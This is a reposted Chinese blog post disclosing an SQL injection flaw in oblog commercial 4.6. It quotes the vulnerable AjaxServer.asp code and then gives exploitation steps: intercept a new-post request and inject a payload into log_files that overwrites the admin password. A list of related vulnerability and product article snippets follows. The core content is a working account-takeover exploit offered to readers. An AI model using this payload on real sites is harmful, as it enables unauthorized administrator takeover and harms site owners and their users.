oblog商业版本4.6注射漏洞,直接拿管理员
通过构造特定的语句,可以更改任何用户的密码,包括管理员,严重级漏洞。
漏洞文件:AjaxServer.asp
变量:log_files
语句:log_files=Replace(log_files," ","")
If Left(log_files,1)="," Then log_files=Right(log_files,Len(log_files)-1)
rs("logpics") = log_files
'附加文件处理
If log_files <>"" Then
oblog.Execute "Update oblog_upfile Set logid=" & tid & " Where fileid In (" & log_files & ")"
End if
'Tag处理
利用:
首先找到使用sql版本的系统注册用户test,发表新日志,同时抓包,修改log_files。2);update/**/oblog_user/**/set/**/password= 7a57a5a743894a0e/**/where/**/username=admin;--
关于怎么区别sql和access的版本,目前也没发现好的方法,但是可以通过查看ver.asp文件看到当前版本号。某些版本好象没这文件。 官方好象出补丁了。很多blog门户站都是用的sql的版本,大家就悠着点吧。
转载于:https://www.cnblogs.com/allyesno/archive/2007/08/05/843883.html
oblog商业版本4.6注射漏洞,直接拿管理员相关推荐
- 查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
OpenSSH命令注入漏洞复现(CVE-2020-15778) 目录 漏洞描述 漏洞等级 漏洞影响版本 漏洞复现 修复建议 ▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现.通 ...
- 完美时空客服自助平台SQL注射漏洞
漏洞详情 披露状态: 2010-07-23: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...
- php_rce-攻防世界-web-ThinkPHP版本5的相关漏洞
题目是ThinkPHP版本5的相关漏洞 ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞. s=index/think ...
- ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
ThinkPHP 5.0.x.5.1.x.5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架.借鉴Struts框架的Action对象,同 ...
- [转载] --- Fastjson1.2.68版及以下全版本远程代码执行漏洞通告
再这样,真的要放弃fastjson了 [安全通告]Fastjson <=1.2.68全版本远程代码执行漏洞通告 尊敬的腾讯云用户,您好! 近日,腾讯云安全运营中心监测到,Fastjson < ...
- JEECG商业版本授权说明(仅限企业用户)
JEECG社区秉承开源精神,为大家提供优秀的开源项目 JeecgBoot,同时针对企业用户我们提供商业服务,并提供商业技术支持:因为开源用户群体太大,总有个人咨询商业事情,特此统一回复说明" ...
- JeeWx 商业版本最近新增什么功能啦?
JeeWx 商业版本最近新增什么功能啦? 2014-12-18 jeecg JEECG jeewx开发新功能 一.微信墙 此功能可以设置属于该公共号的微信墙,在微信客户端上输入微信墙即可进入微信墙模式 ...
- JEECG 商业版本最近新增什么功能啦?
JEECG 商业版本最近新增什么功能啦? 2014-12-18 JEECG JEECG jeecg增加新的功能啦!!! 1.流程设计器 2.集成工作流引擎activit,智能化封装,在线配置表单,在线 ...
- JEECG 商业版本和开源版本有什么区别呢?
好纠结啊,JEECG 商业版本和开源版本有什么区别呢? 小J博士来给你解答: 商业版本独有功能: 1.流程设计器 2.集成工作流引擎activit,智能化封装,在线配置表单,在线设计流程,流程和表单挂 ...
- 好纠结啊,JeeWx商业版本和开源版本有什么区别呢?
好纠结啊,JeeWx商业版本和开源版本有什么区别呢? JeeWx开源版本是一套基础微信开发平台,有基础的微信菜单.素材管理.微信对接等基础功能,适合于开发者学习研究. JeeWx商业版本是一套成熟的微 ...
最新文章
- Onew——全球领先的区块链数字资产服务商
- android 获取ListView内部Item高度
- [转载]Dynamic Database Switching in Rails - How to do it
- 【C#】带等待窗体的BackgroundWorker
- seleuium 禁止检测_如何突破网站对selenium的屏蔽
- coin3D中导入机器人模型
- Java利用URL实现文件下载
- android m3u8合成ts,M3U8-TS文件合并为MP4文件
- 如何让WPS像word一样使用快捷键打开MathType
- Room的基本使用(一)
- pymol安装教程linux,Pymol安装与问题解决
- java for 代表什么意思_for(int a:i)在java 编程中是什么意思
- 华硕关闭更新BIOS
- 【Android应用开发之前端——简易App登录页面】
- 运放的原理、应用、参数和命名规则
- 初学微信云开发,云函数实现两数相加
- 引力财经直播室Java 简介
- 苏菲兔子和魔法师小麦
- Wireshark malformed packet
- 对持续集成、 持续交付、持续部署和持续发布的介绍